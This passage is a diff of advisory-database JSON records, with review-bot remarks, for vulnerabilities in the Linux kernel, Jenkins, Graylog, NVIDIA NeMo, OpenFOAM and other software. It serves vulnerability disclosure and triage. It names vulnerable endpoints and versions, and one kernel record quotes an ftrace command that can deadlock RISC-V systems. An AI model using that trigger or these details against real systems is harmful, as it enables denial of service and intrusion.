@@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-787p-86v4-hhfg", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23217" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: trace: fix snapshot deadlock with sbi ecall\n\nIf sbi_ecall.c's functions are traceable,\n\necho \"__sbi_ecall:snapshot\" > /sys/kernel/tracing/set_ftrace_filter\n\nmay get the kernel into a deadlock.\n\n(Functions in sbi_ecall.c are excluded from tracing if\nCONFIG_RISCV_ALTERNATIVE_EARLY is set.)\n\n__sbi_ecall triggers a snapshot of the ringbuffer. The snapshot code\nraises an IPI interrupt, which results in another call to __sbi_ecall\nand another snapshot...\n\nAll it takes to get into this endless loop is one initial __sbi_ecall.\nOn RISC-V systems without SSTC extension, the clock events in\ntimer-riscv.c issue periodic sbi ecalls, making the problem easy to\ntrigger.\n\nAlways exclude the sbi_ecall.c functions from tracing to fix the\npotential deadlock.\n\nsbi ecalls can easiliy be logged via trace events, excluding ecall\nfunctions from function tracing is not a big limitation.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23217" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b0d7f5f0c9f05f1b6d4ee7110f15bef9c11f9df0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b1f8285bc8e3508c1fde23b5205f1270215d4984" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json b/advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json new file mode 100644 index 0000000000000..d00d13a95da0a --- /dev/null 
+++ b/advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78p6-wh6m-9r9w", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60036" + ], + "details": "A vulnerability has been identified in the UA.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running the UA.Testclient.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60036" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json b/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json index 0e2e6f0b944ba..d9fc222a6c232 100644 --- a/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json +++ b/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-269" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, 
diff --git a/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json
new file mode 100644
index 0000000000000..977856997d094
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-85h6-5m3v-gx37",
+ "modified": "2026-02-18T15:31:27Z",
+ "published": "2026-02-18T15:31:27Z",
+ "aliases": [
+ "CVE-2026-27099"
+ ],
+ "details": "Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the \"Mark temporarily offline\" offline cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure or Agent/Disconnect permission.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27099"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2026-02-18/#SECURITY-3669"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T15:18:43Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json b/advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json
new file mode 100644
index 0000000000000..b8362687aacc6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json
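Review bot: `cwe_ids` is empty and `severity` is `null` in GHSA-85h6-5m3v-gx37 although `details` names a stored cross-site scripting issue, so filters keyed on CWE or severity will pass over this record; `"cwe_ids": ["CWE-79"]` matches the text. `affected` is also empty even though the details give exact ranges (2.483 through 2.550, LTS 2.492.1 through 2.541.1), which means range-based matching cannot flag an installed Jenkins from this file alone. Until the record is reviewed, the linked Jenkins advisory (SECURITY-3669) is the place to check versions. The text limits the issue to accounts holding Agent/Configure or Agent/Disconnect permission, which is worth carrying into triage.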
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-87ff-rq35-47jj",
+ "modified": "2026-02-18T15:31:25Z",
+ "published": "2026-02-18T15:31:25Z",
+ "aliases": [
+ "CVE-2025-7630"
+ ],
+ "details": "Improper Restriction of Excessive Authentication Attempts, Improper Authentication vulnerability in Doruk Communication and Automation Industry and Trade Inc. Wispotter allows Password Brute Forcing, Brute Force.This issue affects Wispotter: from 1.0 before v2025.10.08.1.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7630"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-26-0070"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-287"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T13:16:19Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json
index c94330561f16b..77e61c9efb6e4 100644
--- a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json
+++ b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json
@@ -25,7 +25,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-288"
+ ],
 "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json b/advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json
new file mode 100644
index 0000000000000..aa88979e8a389
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json
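Review bot: `cwe_ids` in GHSA-87ff-rq35-47jj lists only `CWE-287`, but `details` opens with "Improper Restriction of Excessive Authentication Attempts", which is `CWE-307`, and names password brute forcing as the attack. Adding it, `"cwe_ids": ["CWE-287", "CWE-307"]`, keeps the record findable for teams tracking missing lockout or rate-limit controls. The `details` string also runs two sentences together at `Brute Force.This issue`, which trips naive sentence splitting in downstream tooling.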
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-933h-c422-j33j", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33241" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by loading a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33241" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33241" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json b/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json new file mode 100644 index 0000000000000..6ec1cf8e8ebf9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9379-mwvr-7wxx", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33245" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33245" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33245" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json b/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json index d6e16c284b1e6..aebddea98a329 100644 --- a/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json +++ b/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-964f-vc2f-ch6j", - "modified": "2026-02-14T00:32:42Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-14T00:32:42Z", "aliases": [ "CVE-2025-70955" ], "details": "A Stack Overflow vulnerability was discovered in the TON Virtual Machine (TVM) before v2024.10. The vulnerability stems from the improper handling of vmstate and continuation jump instructions, which allow for continuous dynamic tail calls. An attacker can exploit this by crafting a smart contract with deeply nested jump logic. Even within permissible gas limits, this nested execution exhausts the host process's stack space, causing the validator node to crash. This results in a Denial of Service (DoS) for the TON blockchain network.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-674" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-13T22:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json b/advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json new file mode 100644 index 0000000000000..b00448ac4ffec --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json 
@@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c5gg-v573-hv7f", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71227" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: don't WARN for connections on invalid channels\n\nIt's not clear (to me) how exactly syzbot managed to hit this,\nbut it seems conceivable that e.g. regulatory changed and has\ndisabled a channel between scanning (channel is checked to be\nusable by cfg80211_get_ies_channel_number) and connecting on\nthe channel later.\n\nWith one scenario that isn't covered elsewhere described above,\nthe warning isn't good, replace it with a (more informative)\nerror message.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71227" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/10d3ff7e5812c8d70300f6fa8f524009a06aa7e1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/99067b58a408a384d2a45c105eb3dce980a862ce" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json new file mode 100644 index 0000000000000..2120594c9543c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cf26-rj67-f4wr", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1441" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/index_sets/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1441" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json new file mode 100644 index 0000000000000..4721f7998d570 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cw7v-qx8m-563q", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1438" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/nodes/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1438" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json new file mode 100644 index 0000000000000..19cf6653aedee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f7cx-4c4g-9g59", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-61982" + ], + "details": "An arbitrary code execution vulnerability exists in the Code Stream directive functionality of OpenCFD OpenFOAM 2506. A specially crafted OpenFOAM simulation file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61982" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2292" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json b/advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json new file mode 100644 index 0000000000000..2606d106a8a7d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f86v-54pm-58q4", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33236" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where malicious data created by an attacker could cause code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33236" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33236" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json new file mode 100644 index 0000000000000..36804edf5a62e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ff7j-jwgr-hgxp", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1436" + ], + "details": "Improper Access Control (IDOR) in the Graylog API, version 2.2.3, which occurs when modifying the user ID in the URL. An authenticated user can access other user's profiles without proper authorization checks. Exploiting this vulnerability allows valid users of the system to be listed and sensitive third-party information to be accessed, such as names, email addresses, internal identifiers, and last activity. The endpoint 'http://:12900/users/' does not implement object-level authorization validations.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1436" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json b/advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json new file mode 100644 index 0000000000000..f45ebc2defe70 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json 
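Review bot: The endpoint quoted at the end of `details` in GHSA-ff7j-jwgr-hgxp reads `'http://:12900/users/'`, with an empty host. This looks like an angle-bracket placeholder that was stripped somewhere upstream. Someone checking API or proxy logs for access to this path needs an unambiguous port and path, so I would write it as `'http://<host>:12900/users/'` or reduce it to the path and port. The original placeholder is not visible here, so the wording should be checked against the INCIBE notice in `references`.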
@@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fjxh-qxr5-g7j4", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71228" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nLoongArch: Set correct protection_map[] for VM_NONE/VM_SHARED\n\nFor 32BIT platform _PAGE_PROTNONE is 0, so set a VMA to be VM_NONE or\nVM_SHARED will make pages non-present, then cause Oops with kernel page\nfault.\n\nFix it by set correct protection_map[] for VM_NONE/VM_SHARED, replacing\n_PAGE_PROTNONE with _PAGE_PRESENT.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71228" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/046303283d02c9732a778ccdeea433a899c78cbd" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/380d7c1af4bd3e797692f5410ab374a98e766cd4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5fbdf95d2575ec53fd4a5c18e789b4d54a0281fe" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9531210f348aa78e260a9e5b0d1a6f7e7aa329e6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d5be446948b379f1d1a8e7bc6656d13f44c5c7b1" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json b/advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json new file mode 100644 index 0000000000000..8b8da0f7c4111 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqmg-pv5x-v55p", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33252" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33252" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33252" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json b/advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json new file mode 100644 index 0000000000000..36922284a047a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json 
@@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g5pw-hppv-79r6", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23215" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/vmware: Fix hypercall clobbers\n\nFedora QA reported the following panic:\n\n BUG: unable to handle page fault for address: 0000000040003e54\n #PF: supervisor write access in kernel mode\n #PF: error_code(0x0002) - not-present page\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS edk2-20251119-3.fc43 11/19/2025\n RIP: 0010:vmware_hypercall4.constprop.0+0x52/0x90\n ..\n Call Trace:\n vmmouse_report_events+0x13e/0x1b0\n psmouse_handle_byte+0x15/0x60\n ps2_interrupt+0x8a/0xd0\n ...\n\nbecause the QEMU VMware mouse emulation is buggy, and clears the top 32\nbits of %rdi that the kernel kept a pointer in.\n\nThe QEMU vmmouse driver saves and restores the register state in a\n\"uint32_t data[6];\" and as a result restores the state with the high\nbits all cleared.\n\nRDI originally contained the value of a valid kernel stack address\n(0xff5eeb3240003e54). After the vmware hypercall it now contains\n0x40003e54, and we get a page fault as a result when it is dereferenced.\n\nThe proper fix would be in QEMU, but this works around the issue in the\nkernel to keep old setups working, when old kernels had not happened to\nkeep any state in %rdi over the hypercall.\n\nIn theory this same issue exists for all the hypercalls in the vmmouse\ndriver; in practice it has only been seen with vmware_hypercall3() and\nvmware_hypercall4(). For now, just mark RDI/RSI as clobbered for those\ntwo calls. 
